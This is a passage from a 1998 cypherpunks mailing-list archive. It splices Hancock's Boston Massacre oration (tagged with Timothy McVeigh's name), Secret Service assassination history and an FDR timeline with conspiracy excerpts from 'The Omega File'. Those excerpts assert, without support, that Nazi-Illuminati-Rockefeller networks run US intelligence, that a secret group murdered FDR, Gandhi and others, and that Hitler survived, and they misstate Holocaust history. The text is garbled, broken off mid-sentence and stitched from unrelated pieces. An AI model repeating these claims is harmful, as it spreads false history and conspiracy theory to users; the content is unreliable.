represented by an individual human life, never! As regards the real
life of people and
what happens to them", there is - and we must never forget it - "a
detestable
complicity between the globalised logic of capital and the French mania
to preserve
their identity". 

the nation-state - a recent and transitory historical
phenomenon (7) - is clearly not the symbolic ideal construct some sentimental
elements of the left like to imagine. It has been a key factor in colonial
wars,
opposition to the labour movement, enforcing moral order, discrimination
against
women, the marginalisation of minorities, and so on and so on. And
the current drift
into authoritarian attitudes vis-Y-vis "dangerous elements" and immigrants
is
unacceptable, even in the name of a self-styled "republican order".

How are we to find new forms of rebellion, of dissidence, to meet the
new global
challenges?
With
modern means of communication, especially the Internet, it is easy
to establish
worldwide networks, mobilise, act. 

But to act locally and on a world scale, to "think global", it is necessary
to rediscover
universalism, a universalism that is not confined to the values of
Western White men,
who fall into a trance at the sight of a young girl in a veil and whose
real aim in life, to
quote Alain Badiou, is "the uniform imposition of what they imagine
to be modern".

Humanitarian action or laissez-faire?

The stagnation of the Soviet system and the collapse of the communist
utopia brought
discredit on a certain version of internationalism. Even the humanitarianism,
which
rallied millions of men and women to the cause of emergency aid in
time of war and
natural disaster, rapidly ran out of steam. No-one was quicker than
the organisers of
M_dicins sans fronti_res, the organisation that exemplifies that approach,
to condemn
the political authorities' use of "humanitarian" aid to justify a laissez
faire attitude
towards the crimes in Bosnia or the genocide in Rwanda. 

And yet, in the face of fundamentalism, hardening attitudes on identity,
or
confrontations between increasingly insulated ethnic groups (which
do not prevent
their foot-soldiers from drinking Coca Cola, their intellectuals from
using Microsoft
software, and their leaders from calling on the resources of international
capital), the
peoples of the world have got to find new ways of "living together"
and "fighting
together". They have nothing to lose from embracing this ideal and,
to quote Marx
and Engels, "they have a world to win".

Translated by Barbara Wilson

The US is, in fact, operated as a fascist state by bureaucrats.
~ Bill Payne

~ John Hancock
Security to
the persons and properties of the governed is so obviously the design
and
end of civil government, that to attempt a logical proof of it would
be like
burning tapers at noonday, to assist the sun in enlightening the world;
and it
cannot be either virtuous or honorable to attempt to support a government
of which this is not the great and principal basis; and it is to the
last degree
vicious and infamous to attempt to support a government which manifestly
tends to render the persons and properties of the governed insecure.

Some boast of being friends to government; I am a friend to righteous
government, to a government founded upon the principles of reason and
justice; but I glory in publicly avowing my eternal enmity to tyranny.

They have declared that they have
ever had, and of right ought ever to have, full power to make laws
of
sufficient validity to bind the Colonies in all cases whatever. They
have
exercised this pretended right by imposing a tax upon us without our
consent; and lest we should show some reluctance at parting with our
property, her fleets and armies are sent to enforce their mad pretensions.

it was easy to foresee
the consequences which so naturally followed upon sending troops into
America to enforce obedience to acts of the British Parliament, which
neither God nor man ever empowered them to make. It was reasonable
to
expect that troops, who knew the errand they were sent upon, would
treat
the people whom they were to subjugate, with a cruelty and haughtiness
which too often buries the honorable character of a soldier in the
disgraceful name of an unfeeling ruffian. 

they thought it not enough to violate our civil
rights, they endeavored to deprive us of the enjoyment of our religious
privileges, to vitiate our morals, and thereby render us deserving
of
destruction.

But what, my
countrymen, withheld the ready arm of vengeance from executing instant
justice on the vile assassins? Perhaps you feared promiscuous carnage
might ensue, and that the innocent might share the fate of those who
had
performed the infernal deed. But were not all guilty? Were you not
too
tender of the lives of those who came to fix a yoke on your necks?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 00:15:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR6
Message-ID: <009C9C7C.5221FFE0.13@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


And though the
murderers may escape the just resentment of an enraged people; though
drowsy justice, intoxicated by the poisonous draught prepared for her
cup, still nods upon her rotten seat, yet be assured such complicated
crimes will meet their due reward.

Standing armies are sometimes (I would by no
means say generally, much less universally) composed of persons who
have rendered themselves unfit to live in civil society; who have no
other
motives of conduct than those which a desire of the present gratification
of
their passions suggests; who have no property in any country; men who
have given up their own liberties, and envy those who enjoy liberty;
who
are equally indifferent to the glory of a George or a Louis; who, for
the
addition of one penny a day to their wages, would desert from the
Christian cross and fight under the crescent of the Turkish Sultan.
From
such men as these, what has not a State to fear? With such as these,
usurping Caesar passed the Rubicon; with such as these, he humbled
mighty Rome, and forced the mistress of the world to own a master in
a
traitor. These are the men whom sceptred robbers now employ to frustrate
the designs of God, and render vain the bounties which his gracious
hand
pours indiscriminately upon his creatures. By these the miserable slaves
in
Turkey, Persia, and many other extensive countries, are rendered truly
wretched, though their air is salubrious, and their soil luxuriously
fertile. By
these, France and Spain, though blessed by nature with all that administers
to the convenience of life, have been reduced to that contemptible
state in
which they now appear
But since standing armies are so hurtful to a State, perhaps my
countrymen may demand some substitute, some other means of rendering
us secure against the incursions of a foreign enemy. But can you be
one
moment at a loss? Will not a well-disciplined militia afford you ample
security against foreign foes? We want not courage; it is discipline
alone in
which we are exceeded by the most formidable troops that ever trod
the
earth. 
A well-disciplined militia is a safe, an
honorable guard to a community like this, whose inhabitants are by
nature
brave, and are laudably tenacious of that freedom in which they were
born.
>From a well-regulated militia we have nothing to fear; their interest
is the
same with that of the State. When a country is invaded, the militia
are
ready to appear in its defense; they march into the field with that
fortitude
which a consciousness of the justice of their cause inspires; they
do not
jeopard their lives for a master who considers them only as the instruments
of his ambition, and whom they regard only as the daily dispenser of
the
scanty pittance of bread and water. No; they fight for their houses,
their
lands, for their wives, their children; for all who claim the tenderest
names,
and are held dearest in their hearts; they fight pro aris et focis,
for their
liberty, and for themselves, and for their God. 

I cannot here forbear noticing the
signal manner in which the designs of those who wish not well to us
have
been discovered. The dark deeds of a treacherous cabal have been
brought to public view. ou now know the serpents who, whilst cherished
in your bosoms, were darting the envenomed stings into the vitals of
the
constitution. But the representatives of the people have fixed a mark
on
these ungrateful monsters,

Surely you never will tamely suffer this country to be a den of thieves.

Break in sunder, with noble disdain, the bonds with which the
Philistines have bound you. Suffer not yourselves to be betrayed, by
the
soft arts of luxury and effeminacy, into the pit digged for your destruction.
Despise the glare of wealth. That people who pay greater respect to
a
wealthy villain than to an honest, upright man in poverty, almost deserve
to
be enslaved; they plainly show that wealth, however it may be acquired,
is,
in their esteem, to be preferred to virtue. 

The virtuous asserter of the rights of
mankind merits a reward, which even a want of success in his endeavors
to
save his country, the heaviest misfortune which can befall a genuine
patriot,
cannot entirely prevent him from receiving. 
{Timothy McVeigh - sog}

~~~~~~~~~~~~~~~~~~
Secret Service
the start of the Spanish-American War led to the first legal use of
the Secret
Service for Presidential protection. A detail of four agents, operating
under special emergency was
fund, was assigned to the Executive Mansion to guard McKinley around
the clock. They were
stationed on the first and second floors of the Mansion and on the
White House grounds. [13]

[13 During the Spanish-American War, the Secret Service also served
as the primary intelligence
agency for the War Departnent. It gathered intelligence and conducted
counter espionage activities
both domestically and abroad.]

72

After the war, Secret Service operatives continued to serve at the
White House at least part
of the time. In addition, operatives regularly accompanied McKinley
during his travels. With the
expiration of the emergency war fund these activities once again exceeded
the Secret Service's
statutory authority. However, Secret Service Chief John Wilkie felt
obligated to provide the
protection anyway. President McKinley received a large number of threats,
which seemed
particularly credible in light of a series of political assassinations
that took place in Europe during
this period.

In 1901, President McKinley was shot and fatally wounded by anarchist
Leon Czolgosz
while standing in a receiving line at the Pan American Exposition in
Buffalo, New ork. Three
Secret Service operatives were guarding him at the time, along with
eighteen exposition policemen,
eleven members of the Coast Guard, and four Buffalo city detectives.
One of the Secret Service
operatives was out of position when Czolgosz approached President McKinley,
because the
president of the exposition d requested the spot directly next to MdCinley,
where the operative
normally stood.

, in 1906, Congress quietly included language in the Sundry Civil Expenses
Act authorizing
the Secretary of the Treasury to use funds for "the protection of theperson
of the President of the
United States."
{Treasury=Money=Illuminatti - sog}

Since the Secret Service was officially
authorized to provide protective services in 1906, only one person
has been killed under its watch
- President John F. Kennedy, who was fatally wounded by Lee Harvey
Oswald while riding in a
motorcade through Dallas, Texas, on November 22, 1963.

Since the inception of the Secret Service, however, there also have
been six other
potentially deadly assaults on Secret Service protectees.

The first occurred on February 1, 1933, in Miami, Florida Giuseppe
Zangara fired five
shots a President-elect Franklin D. Roosevelt, who was making an impromptu
speech while sitting
in an open car that had stopped momentarily. Although none of the shots
hit President Roosevelt,
Zangara mortally wounded Anton Cermak, the Mayor of Chicago, and hit
four other people,
including a Secret Service agent.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 00:15:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR7
Message-ID: <009C9C7C.5CABC0E0.15@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


The Manchurian Candidate
~ Raymond Shaw

1901 
McKinley is assassinated by anarchist; he is succeeded by Theodore
Roosevelt

1911 
FDR receives degree of Master Mason conferred by Holland Lodge No.
8, New ork
City, 28 November

1913 
FDR is appointed assistant secretary of the Navy, April

1919 
FDR travels to Europe to supervise naval establishment, January-February
  1919 -- Adolph Hitler joins the Thule Society in Germany.  In the
Thule Society, the 'black sun' played a prominent role as a 'sacred'
symbol of the Aryans.  The inner core within the Thule Society are
all Satanists. 

1927 
FDR founds the Georgia Warm Springs Foundation, therapy center for
the treatment of
polio victims
Stalin becomes Soviet dictator
{FDR given quarter-million to run - sog}

1928 
FDR again placed in nomination at Democratic National Convention B
Governor Alfred
E. Smith
FDR is elected governor of New ork, opposed by Alfred Ottinger, by
50.3 percent of the
vote, 6 November

1933 
FDR is shot at in assassination attempt in Miami, Florida, by Guiseppe
Zangara, 15
February
FDR is inaugurated as 32nd president, 4 March
U.S. recognizes the USSR and resumes trade
The Twenty-First Amendment repeals prohibition

1945 
FDR dies, Warm Springs, Georgia, 12 April; buried Hyde Park, New ork,
15 April
Mussolini is killed
Hitler commits suicide, Germany surrenders

He fired shot after
shot at FDR, but a woman's quick move knocked the gun upward. The bullets
hit several
bystanders and mortally wounded Mayor Cermak of Miami. 
{Cermak was standing *beside* FDR-gun knocked upward would not change
hit targets - sog}

In assassination cases, there has always existed the dilemma of establishing
the murderer's
sanity. Authorities are uncomfortable to admit that sane people kill
government leaders. At the
same time, many feel that if the assassin is deemed insane, he will
escape "proper" punishment.
It is much easier to lock upon the assassin as a steely-eyed, cold
blooded killer, who is a threat
to society...and only half crazy.

Nineteen days after Fromme's failed attempt, Sara Jane Moore fired
a shot at President Ford,
but missed. Prior to the attack, she wrote the following poem:

"Hold-Hold, still my hand.
Steady my eye, chill my heart,
And let my gun sing for the people.
Scream their anger, cleanse with their 
hate,
And kill this monster."

While most assassins have deep, emotional problems, few are truly insane,
unable to distinguish
between right and wrong. Defendants are presumed to be sane and responsible
for their crimes
until the contrary can be proven. In order to establish insanity, it
must be proved that, at the time
of the offense, the defendant was laboring under such a defect or disease
of the mind so as not
to know the nature and quality of the act or did not know that it was
wrong. This is referred to
as the McNaughton Rule, and it is based on an 1843 assassination case.

John Schrank was convicted of shooting former-President Theodore Roosevelt
in 1912.
Roosevelt recovered from the wound and carried Schrank's bullet in
his chest for the rest of his
life

John W. Hinckley Jr. was acquitted by reason of insanity for shooting
President Ronald Reagan
in 1981. He has been held in St. Elizabeth's Hospital since his trial
and has petitioned the courts
to win his release.
{Cermak-Brady - sog}

In 1935, Dr. Carl Weiss shot and killed Senator Huey Long outside the
governor's office of the
Louisiana State Capitol Building in Baton Rouge. Long's bodyguards
opened fire on Weiss,
killing him instantly. He suffered more than 50 bullet wounds. There
is evidence that suggests
Long was accidentally shot and killed by one of his own guards.ods
are those with high rates of female-headed
families, welfare dependency and labor force and school dropouts. 

In 1990, in the typical
"bad behavior" white underclass tract, 55 percent of the men did not
participate in the work force
and 42 percent of the residents had dropped out of school; the corresponding
figures for black
tracts were 62 percent and 36 percent...
They are easy for politicians to manipulate and are no threat to do
anything very imaginative or even act in concert in defense of their
own interests without outside
leadership. They also constitute a talking point. Politicians can talk
about taking steps to correct
the problem and improve conditions for these "victims of society."
Humans are social beings, they require an emotional and spiritual bond
to their
society, with that society viewed as a collective entity. Intellectuals
spend their lives constructing
and tinkering with their identities.

the educational system of the United States. It is
clearly inadequate, since ordinary people in an advanced industrial
society should be able to handle
abstract reasoning 
It is not that the system has failed at what it set out to
do. One cannot be said to have failed at something one has never attempted.
It is important to keep ordinary people in their place
If ordinary people were able to reason effectively and draw conclusions
about matters outside of
their day to day experience, then they might start asking questions
that politicians would have
difficulty answering.

t the belief in lack of ability tends to bring about that lack of ability.

What one must keep in mind in regard to this stereotype is that it
constitutes an assertion as to fact.
In other words, it is not a moral principle, it is not a value judgement,
and it is not, in itself, an
expression of prejudice. If one were to assert it, knowing and believing
that it was false, then it
would be an expression of prejudice.
One can only be truly equal if one accepts the same burdens and responsibilities
as everyone else.
. One, of course, needs to throw in the sexual stereotypes also, since
they played a similar role in building identity. The main problem is
to understand the function of
ethnic identity in a society.

sense of duty and obligation. One cannot feel
such a sense of duty without a clear understanding of one's place in
the world. That is what identity
is all about. The collective identity, which the people of Oaxaca have,
is what makes each
individual accountable to society. Peer pressure, as one sees in operation
in the case of Mr.
Santiago, is the means by which a fully functional society influences
and modifies the behavior of its
members.

In the United States, such outpourings of ethnic sentiment on the part
of the dominant culture are
discouraged
There is to be no
expression of ethnic identity not approved by the intellectual establishment.
The government must
seek to suppress any alternative means of social control. All legitimate
power must be held by the
government, even to the point of making every member of society a criminal.
*** {TCM tag-line - sog} ***

e sum total of the effort. Attacks on certain forms of religious expression
are part of it also, but it
is the "Civil Rights Movement" that provides an excuse for government
to intrude into all kinds of
interpersonal relationships. The more the government can do this, the
more people are alienated
from society. People are no longer accountable to one another but to
a vast impersonal
bureaucracy. One must recall that this is the basic premise of Totalitarian
social organization.

The purpose of this effort is to crush all opposition to the agenda
of the ruling oligarchy. The
democratic forms are meaningless in the absence of a willingness on
the part of the population in
general to assume collective responsibility for the maintenance of
social order. All power ultimately
lies in the hands of those who perform that function. The people in
general can only do this by
means of imposing their collective identity in the ways the author
has described. If one can destroy
the emotional and spiritual bonds that provide the sort of collective
identity which U.S. society
once had, then one has only millions of sheep and a few wolves.

. From a recent book on the human brain one has:
The sexes are different because their brains are different. The brain,
the chief administrative and
emotional organ of life, is differently constructed in men and in women;
it processes information in
a different way, which results in different perceptions, priorities
and behavior.

human behavior in general is much more biologically driven than was
believed previously.
What this means, among other things, is that human behavior cannot
be modified beyond certain
limits. It is not possible, for instance, to fundamentally change the
nature of the male/female
relationship

The problem in this Detroit neighborhood is not that welfare benefits
are too low. After all, these
people are very wealthy compared to Mr. Santiago. What they have not
received from society is a
strong sense of ethnic identity. As a result, they have rejected society
and have set out to make
their own. One sees them assuming the responsibility for the maintenance
of social order but in an
antisocial context. The gang symbols and mode of dress are a typical
male effort to impose their
identity on the environment, just as Mr. Santiago was doing in placing
flowers at the statue of the
patron saint. In the matter of the gang symbols, however, one sees
a pattern of social
disintegration.

In the case of Americans, great efforts are made in the form of entertainment,
bizarre
religious activities (The Branch Davidians, for example), appeals to
great collective efforts (Save
the Whale), self improvement (lose weight), and many other artificial
undertakings to give life
meaning and purpose. 

The problem with American society is precisely this artificiality.
If one rejects ethnic identity and
the social cohesion that it provides, then one must resort to coercion.

Unfortunately, there is an end to that twisted path. In order to survive,
a society must conform itself
to the psychological needs of the average person and not attempt to
coerce people into
conforming to some false ideology. 
the government is a big
part of the cause of the problem in that it has set out to undermine
identity

1927
Despite international protest and allegations of perjury,
evidence tampering, and judicial prejudice, Anarchists
Nicola Sacco and Bartolomeo Vanzetti are executed for
robbery and murder. 

1966
Eagle Scout and ex-Marine Charles Whitman opens fire
from atop the 27-story tower at the University of Texas at
Austin. He kills 21 people and wounds nearly 30 before
being killed by police. 

  THE OMEGA FILE:   
  [Greys, Nazis, Underground Bases, and the New World Order]  
          by Branton
they have taken control of much of the 'underground black budget empire'
-- a vast network of interconnected underground military-industrial
bases and cities that have been constructed with the assistance of
TRILLIONS [yes, I said TRILLIONS] of dollars siphoned from the American
economy via taxes, drugs, organized crime, etc., money which has literally
gone 'down the tubes', leaving our economy in a state of chaos.  
{Is it reasonable to believe that those who monitor 'all'
communications, and control banking & finance become 'stupid'
when it comes to Trillions of dollars of black-market income?
Duhhh... - sog}

  510410 - Truman relieves General MacArthur of his command and replaces
him with Gen. Ridgeway, a CFR member.  MacArthur earlier disobeys U.N.
directives by initiating a secret attack on the Communist stronghold
at Inchon [leading to a quick end of the war], after he and other military
leaders suspected the pro-Socialist U.N. officials of betraying their
battle plans to the North Koreans.  Truman goes into hiding at Camp
David for two weeks following MacArthur's return, fearing that the
highest-ranking military general in the United States would arrest
him for treason.  After Truman fires MacArthur for his unauthorized
military action, he recieves much condemnation from confused and angered
patriotic Americans who criticize Truman for his decision.

  521104 - NSA: Presidential Executive Orders exempts NSA from all laws.
National Security Agency imputed with even more power and influence
than CIA.
  530000 - Dwight Eisenhower becomes president.  Eisenhower appoints
Nelson Rockefeller to group on Govt. reorganization.  It was Rockefeller,
in collaboration with 'Nazi' agents, who assisted in the establishment
of MJ-12, the NSA and CIA as fronts for Bavarian Intelligence, a 'secret
government' within the Constitutional government.  Many who have gotten
close to the CIA's ultimate secret -- that is the Nazi S.S. controlling
factor -- are murdered by CIA assassins.  Allan Dulles, CIA Director,
approves mind control project MKDELTA.  
{Post-War Presidents / Navy / CIA / NSA - sog}

  740000 - Gerald Ford becomes President.  Nelson Rockefeller becomes
Vice-president.  (Note: Here is an alternative to a famous parable:
"A fool and his money are soon elected"! - Branton)

  1919 -- Adolph Hitler joins the Thule Society in Germany.  In the
Thule Society, the 'black sun' played a prominent role as a 'sacred'
symbol of the Aryans.  The inner core within the Thule Society are
all Satanists. 

1919 
FDR travels to Europe to supervise naval establishment, January-February

  1934 -- the vast Rockefeller financial empire, in an effort to back
German racial superiority and eugenics, financially supports Nazi Germany
in collaboration with Prescott Bush [George Bush's father].  In 1929
the German Ernst Rudin enacts German Sterilization Laws.
{Eugenics was Policy forerunner of Planned ParentHoods - sog}

  1943 -- General Reinhard Gehlen infiltrates Soviat intelligence. 
Gehlen forms a partnership with Allen Dulles [a Bavarian Illuminist
and American 'Nazi'], which results in the creation of the CIA [and
some years later the more powerful NSA] from a core of Nazi SS intelligence
officers brought to the US under the auspices of Operation Sunrise,
Overcast, and Paperclip

On April 12, Roosevelt dies and Harry Truman, a high Mason as was Roosevelt,
becomes President of the United States.  On May 7, 1945, Germany surrenders.

Whether Truman was directly aware of the fact that his sponsors, the
German-American Rockefellers, had financed the Bolshevik and Nazi revolutions,
is uncertain.  

  1952 -- Reinhard Gehlen and Allen Dulles are dubbed Knights of Malta
by the VATICAN.

Jesus of Nazareth - the Christ - or Melchizedek

The following are some of the subjects that radio personality David
Emory has covered on his talk-radio broadcasts in California:

-- The pivotal role that Nazi and fascist elements played in the assassination
of President Kennedy... evidence that American and German "Neo-Nazis",
the Gehlen spy organization and Nazi rocket specialists working under
Werner Von Braun figured prominently in the killing.
-- The support American industrialists and financiers gave to Hitler's
Germany and how this affected the allied military policy during the
war as well as the incorporation of the Third Reich's intelligence
forces into the CIA at the conflict's conclusion.
-- The SS origin of the Green Berets, the re-establishment of Nazi
elements in West Germany after the war, as well as Nazi influences
on Senator Joe McCarthy, Interpol and the Alger Hiss case.
-- The pivotal role in the Cold War played by Hitler's most important
spymaster and his Nazi Eastern Front intelligence organization... the
Gehlen organization's incorporation into the CIA; its role in establishing
Radio Free Europe AND the first Palestinian terrorist groups as well
as Gehlen's personal political ideology.
-- The evolution of American fascism from the 1930's to the present...

-- The assassination program which eliminated the democratic leadership
of Weimar Germany paving the way for Hitler's rise to power... the
formation of the Nazi Party as a front for German military intelligence.
-- The Third Reich's extermination programs from the "mercy killing"
of handicapped children to the Auschwitz death factory.  The Nazi liquidation's
are exposed as a direct outgrowth of the international eugenics and
mental hygiene movements, both mainstream movements with important
implications for contemporary society.
-- Circumstantial evidence suggesting that then vice-president George
Bush may have been involved with the attempt on the life of former
President Reagan... the close connections between the family of convicted
would-be assassin John Hinckley and the Bush family as well as Hinckley's
Nazi background. 
-- Livin' In The USA: The Search for Nazi War Criminals.  In 1985,
the San Francisco Examiner listed ten Third Reich fugitives considered
to be the "most wanted" of all war criminals... the fact that most
of them worked for U.S. intelligence after the war.
-- Adolf Hitler's escape from Germany at the end of World War II using
information contained in previously classified U.S. intelligence archives,
accessed by a London Times journalist and discussed in a military history
quarterly.
--(Note: It is indeed curious that the American Psychiatric Association
initially contained over 2,000 German 'immigrant' members following
World War II.  The APA also was/is involved in GUN CONTROL lobbying.
Branton)
-- From the www.buildfreedom.com website we read: "A principle player
in the 1974 foundings of both HCI [then called the National Council
to Control Handguns] and the NCBH [National Coalition to Ban Handguns,
now renamed the Coalition Against Gun Violence] was Ed Wells, who was
A 25-EAR VETERAN OF THE COVERT OPERATIONS DIVISION OF THE CIA... There
was also a fund raiser for NCBH hosted by the man Nixon appointed as
CIA Director, William Colby... HCI spokesman Greg Risch -- incredibly
-- admitted that "SURE THERE ARE A LOT OF CIA PEOPLE IN IT [HCI]",
and also stated that there are quite a few "EX-CIA WHO DONATE TO US."

-- Several reasons for American's lack of awareness of fascism, its
history and its methodology: lowering American educational standards
and the deliberate obfuscation of the historical connection between
powerful industrial and financial interests and fascism.  Both have
significantly undermined contemporary understanding of the political
forces which produced Hitler and Mussolini...
-- the clandestine methodology of fascism, in particular the underground
organizational structure of fascist movements and its effectiveness
in subverting established democracies... 

In the aftermath of World War I, the German Nazis learned that anti
communism could be used to achieve strategic leverage over Germany's
prospective enemies such as Great Britain and the United States. 
  The Third Reich sought to escape the full consequences of military
defeat in World War II by playing the anti-Communist card again.  
Although a few of the more obvious and obnoxious elements of Nazism
were removed, Nazis were returned to power at virtually every level
and in almost every capacity in the Federal Republic of Germany. 

  In its American incarnation, liberation theory called for "rolling
back" communism out of Eastern Europe and the break-up of the Soviet
Union into its constituent ethnic Republics.
{We give half of Europe to the Soviets and then immediately 
declare them the Great Enemy, and strive to 'free' the same
countries we handed them. Duuhhh... -sog}

the United States badly compromised its democratic institutions during
the Cold War, possibly beyond repair.

Mind Control - or if the phrase "remember to forget" has a great significance
to you, you may want to read on & consider contacting me.  
{Elvis / "I Forgot To Remember To Forget" - sog}
"Oswald Acted Alone, But Elvis Was Part Of The Conspiracy"

Although Texas law
required an immediate autopsy in Dallas, the site of the crime, Crenshaw
insisted that a swarm of Secret Service agents entered the hospital
and demanded that the autopsy be performed out of state.  It is interesting
that the Secret Service of the U.S. and other countries are reportedly
patched directly into the highest levels of Scottish Rite Masonry,
or the Bavarian Illumiati.  

Every witness who could shed light on the Kennedy murders has been
systematically hunted down and murdered.  [I seek information from
those who were in it.  I believe I already know one who was.  ou might
know something about it if you recognize the code name BLACKHAWK. 

Other victims of assassination by the Group whose names will be recognized
include Franklin D. Roosevelt, Marilyn Monroe, Mahatma Gandhi, Anwar
Sadat & Olof Palme. There have been many thousands more.

Dwight D. Eisenhower -- whose campaign was sponsored by the Rockefellers
and through whose administration many of the national socialist policies
of the Rockefellers were implemented within the U.S. Intelligence Agencies

They want to impose on this planet a centralized world oligarchy -
not a democracy -- akin to a FASCIST state in which there will be genocide
on a massive scale, total state control over all aspects of human behavior
and communication and control of the human mind and spirit through
manipulation of the world's major religions, genetic engineering, drugs,
tightly-controlled media and by other means.  
{We are 'part-time' defenders against genocide,etc. - sog}
{Part-time defenders against DrugLordsWhoHaveConnectionsToBush - sog}

Brave New World.  Huxley apparently knew about the plan from his brother.

  In addition, a good part of the funding over the years has come from
large-scale diversions of funds from all major treasuries in the western
world.
The 'skim' appears to be about .5% of all incoming funds.

one of Gen. Gehlen's specialties in WWII Nazi intelligence -- divert
attention to the "Red menace."  

   What the Group wanted by the time of the "incubation period" [1995
2000] was a society that was uneducated, amoral, uncommitted to democratic
institutions, living in fear, with a sudden and very drastic reduction
in spendable income simultaneous with societal chaos.  

dramatically increased media [TV] portrayal of violence and joblessness
[role models have no jobs, bad guys live in big houses, etc.; begin
your reading with 'The Early Window', by Liebert & Sprafkin], reduced
the standards of education and early training for rational thought

{Roosevelt's Spending War --> Cold Spending War --> War Spending
On Drugs --> War On InterNetCrimePedophileTerrorists - sog}

(Remember that the 'root' of the 'New World Order' agenda can be traced
back to the secret occultic societies connected to Bavaria, Germany
-- the Illuminati, Thule, Nazis, Vril, Rosicrucian, Black Gnostics,
Skull & Bones, Cult of the Serpent, Templars, Babylon Mystery Cult,
O.T.O., Golden Dawn, Jesuits, and all of the many lesser-known inter
locking secret societies which grew out of the occult-military core
of the early Roman Empire and the later 'Holy Roman Empire' [HO.R.E.]
-- a core that had its center of power not only in Rome but also in
Germany. - Branton) 

They kill on command.  THE ARE ARTIFICIALL-PRODUCED 'MULTIPLE' PERSONALITIES.
One of the top people in their development appears to have been Sirhan
Sirhan's psychiatrist, DR. DIAMOND.

the United Nations Organization or UNO is deeply involved in this fascist
global conspiracy.  Just note the controversy surrounding former U.N.
Secretary General and Austrian Kurt Waldheim concerning his Nazi past
and allegations that he is a war criminal

secret Nazi S.S.-connected Society which reputedly has retrieved the
"Spear of Destiny" which so fascinated Adolph Hitler

On the outside Nazism and Communism may seem to be in conflict, however
it was the Rockefellers and the German Black Nobility cults who created
BOTH movements.  Tyranny is tyranny, whether it be National Socialism
or Global Socialism.  Perhaps the Bavarians created two types of Socialism:
Global Socialism -- as a means to tear down the international competition;
and National Socialism -- as a means to build up the German empire.

We should NEVER forget that Lenin, the Communist Revolutionist, was
an agent of the GERMAN government.  What is not commonly known is that
Stalin murdered nearly 6 million Jews during the World War II period,
as did Hitler.  

the Rockefeller's -- according to Economics expert and advisor Antony
Sutton and others -- had financially backed BOTH the Bolsheviks AND
the Nazis 
We must remember that National Socialism [Nazism] IS 'Socialism' 

  Col. W.J. Heimlich, former Chief, United States Intelligence, at Berlin,
stated for publication that he was in charge of determining what had
happened to Hitler and after a thorough investigation his report was:
"There was no evidence beyond that of HEARSA to support the THEOR
of Hitler's suicide."  He also stated, "On the basis of present evidence,
no insurance company in America would pay a claim on Adolph Hitler."

  I still have the September, 1948, issue of a magazine called "The
Plain Truth" with the headline article: "IS HITLER ALIVE, OR DEAD?,"
subtitled: "Here is summarized the conclusions of an exhaustive three
year investigation -- together with reasons for believing Hitler may
be alive and secretly planning the biggest hoax of all history."
  Another article in November, 1949, says "The Nazis went underground,
May 16, 1943!" and details a meeting at the residence of Krupp von
Bohlen-Halbach, the head of I.G. FARBEN, etc., at which they planned
"FOR WORLD WAR III."
  The June, 1952, issue of "The Plain Truth" is headlined: "HITLER 'May
Be Alive!'"  The article states: "Now, NEW FACTS, or purported facts,
leak out.  It's reported now that in 1940 the Nazis started to amass
tractors, planes, sledges, gliders, and all sorts of machinery and
materials IN THE SOUTH POLAR REGIONS -- that for the next 4 years Nazi
technicians built, on an almost unknown CONTINENT, Antarctica, the
Fuhrer's SHANGRILA -- a new Berchtesgaden."
{HWA/GTA/SOG - sog}

in spite of Glasnost and the new freedom of access to Russian files,
the files on Hitler are still some of the most
highly classified items of the Soviets.
{The citizen as Schillple...we let Them hide the Truth and
then ridicule anyone with an opinion/view which contadicts
the Official Story. - sog}
{Even when The Facts obviously/blatantly contradict the
Official Story...as per, Hitler not proven dead...ever
see *that* in the school history books? - sog}

Harry Dexter White [real name Weiss] under Henry Morgenthau 
When J. Edgar Hoover went to President Truman with all the evidence
that the Assistant Secretary of the Treasury was a Communist spy and
thief, TRUMAN of course removed Weiss [White] from his job -- and PROMOTED
HIM to head of the International Monetary Fund.  I kid you not, look
it up.  (This tells you whose side Truman was really on. - Branton)
The story has a rather common ending -- when a controversy developed
in the press concerning this incident, Weiss became a "suicide."
{AKA/VFoster/SOP - sog}

"Martin Bormann, Nazi in Exile" by Paul Manning 

  The Russians were NATIONALISTS, as opposed to [the] Bolsheviks who
took their country away from them.  The [so-called] Bolsheviks were
trained in the lower East Side of New ork City and financed by New
ork and London bankers.  
They invaded Russia, killed the Tzar and many Nationalists and took
over the government.
{Those with $ and planning win...EoStory. Where do honest people
get funding and support in a corrupt worlds? - sog}

  In 1932, the British-led "Eugenics'' movement designated the Rockefellers'
Dr. Rudin as the president of the worldwide Eugenics Federation.  The
movement called for the killing or sterilization of people whose HEREDIT
made them a public burden.
A few months later, Hitler took over Germany and the Rockefeller-Rudin
apparatus became a section of the Nazi state.  The regime appointed
Rudin head of the Racial Hygiene Society.  Rudin and his staff, as
part of the Task Force of Heredity Experts chaired by SS chief Heinrich
Himmler, drew up the sterilization law.  Described as an American Model
law, it was adopted in July 1933 and proudly printed in the September
1933 Eugenical News [USA] with Hitler's signature.  The Rockefeller
group drew up other race laws, also based on existing Virginia statutes.
  The 'T4'' unit of the Hitler Chancery, based on psychiatrists led
by Rudin and his staff, cooperated in creating propaganda films to
sell mercy killing [euthanasia] to German citizens.  The public reacted
antagonistically:  Hitler had to withdraw a tear-jerker right-to-die
film from the movie theaters.  The proper groundwork had not yet been
laid.

  Under the Nazis, the German chemical company I.G.  FARBEN and Rockefeller's
STANDARD [EXXON] OIL of New Jersey were effectively a SINGLE FIRM,
merged in hundreds of cartel arrangements.  I.G. FARBEN was led up
until 1937 by the Warburg family, Rockefeller's partner in banking
and in the design of Nazi German eugenics.
  Following the German invasion of Poland in 1939, Standard Oil pledged
to keep the merger with I.G. Farben going even if the U.S. entered
the war.  This was exposed in 1942 by Sen. Harry Truman's investigating
committee, and President Roosevelt took hundreds of legal measures
during the war to stop the Standard - I.G. Farben cartel from supplying
the enemy war machine.
  In 1940-41, I.G. Farben built a gigantic factory at Auschwitz in Poland,

DR. MENGELE...
In 1943, Otmar Verschuer's assistant Josef Mengele was made medical
commandant of Auschwitz.  As wartime director of Rockefeller's Kaiser
Wilhelm Institute for Anthropology, Eugenics and Human Heredity in
